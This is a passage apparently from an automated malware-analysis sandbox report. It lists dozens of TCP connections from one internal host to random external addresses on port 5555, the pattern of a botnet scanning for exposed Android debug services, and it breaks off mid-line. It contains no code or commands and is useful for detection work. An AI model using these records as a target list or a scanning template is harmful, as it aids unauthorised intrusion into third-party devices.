    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 151.98.107.119:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 153.197.141.44:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 217.2.182.177:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 148.101.205.11:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 168.243.135.1:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 9.60.91.238:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 169.133.141.176:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 109.172.162.101:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 67.180.177.126:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 253.129.154.58:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 74.240.153.194:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 247.128.93.90:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 79.95.9.58:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 253.9.66.204:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 76.50.203.11:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 160.248.185.130:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 115.90.91.153:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 111.168.157.94:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 94.161.175.253:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 179.130.61.247:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 158.191.235.241:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 82.73.94.197:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 190.66.192.250:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 185.207.103.220:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 78.170.228.216:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 173.222.53.87:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 223.70.104.33:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 156.240.233.25:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 246.112.211.245:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 96.226.99.150:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 133.40.191.17:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 197.70.113.65:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 118.196.114.138:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 14.165.220.214:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 43.236.253.103:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 183.17.247.204:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 114.61.55.119:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 162.244.157.224:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 8.55.76.115:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 62.4.211.141:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 184.38.142.60:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 250.204.38.171:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 198.10.254.230:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 120.157.251.25:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 196.133.14.203:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 53.130.57.180:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 86.226.221.65:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 165.68.127.212:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 69.255.182.133:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 17.231.46.212:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 135.43.200.18:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 24.195.95.91:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 74.212.169.163:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 60.128.53.204:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 201.204.176.171:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 157.215.195.28:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 4.110.225.240:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 16.186.60.222:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 66.9.140.7:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 94.162.116.24:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 158.73.17.244:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 117.175.92.157:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 1.22.74.89:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 110.31.64.202:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 94.12.45.9:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 16.185.48.75:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 69.245.99.10:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 160.240.46.40:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 152.192.192.221:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 182.151.70.121:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 241.106.53.21:5555
    Source: global trafficTCP traffic: 192.168.2.